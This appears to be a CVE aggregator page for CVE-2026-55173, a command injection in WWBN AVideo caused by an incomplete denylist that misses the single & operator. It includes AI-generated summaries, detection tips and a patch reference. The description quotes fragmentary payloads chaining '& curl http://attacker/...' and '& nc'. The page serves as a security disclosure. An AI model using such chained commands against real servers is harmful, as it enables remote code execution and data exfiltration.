CVE-2026-55173
Received Received - Intake

OS Command Injection in WWBN AVideo

Vulnerability report for CVE-2026-55173, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-16

Last updated on: 2026-07-16

Assigner: GitHub, Inc.

Description

WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & (Β the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (β€œan attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-16
Last Modified
2026-07-16
Generated
2026-07-17
AI Q&A
2026-07-17
EPSS Evaluated
N/A
NVD

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
wwbn avideo to 30.0 (exc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

This vulnerability is an OS command injection flaw in WWBN AVideo versions 29.0 and below. It occurs because the fix for a previous vulnerability (CVE-2026-33482) was incomplete. The sanitizeFFmpegCommand() function fails to neutralize the single & (shell background operator), allowing attackers to inject arbitrary commands. The threat model involves an attacker crafting a valid encrypted payload to execute commands on the standalone encoder server.

Detection Guidance

To detect this vulnerability, monitor for unusual command execution patterns or network connections initiated by the AVideo application. Check logs for commands containing single & or command chaining with &. Inspect ffmpeg.json.php for unexpected inputs in codeToExecEncrypted.

Impact Analysis

An attacker could exploit this to execute arbitrary commands on the server running AVideo. This could lead to unauthorized data access, modification, or deletion, system compromise, or further network infiltration. Attackers might chain multiple commands (e.g., download and execute malware) or use payloads like & curl http://attacker/... to exfiltrate data.

Compliance Impact

This vulnerability could lead to unauthorized access or data breaches, violating GDPR (data protection) and HIPAA (health data privacy). Non-compliance may result in legal penalties, fines, or reputational damage. Organizations must patch systems to maintain compliance with these regulations.

Mitigation Strategies

Apply the patch from commit c1cfa2bea8a351a1d07f5758f82887403e3abf1f immediately. Update AVideo to a version beyond 29.0. Review and restrict access to ffmpeg.json.php and sanitizeFFmpegCommand() inputs. Monitor for exploitation attempts.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-55173. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart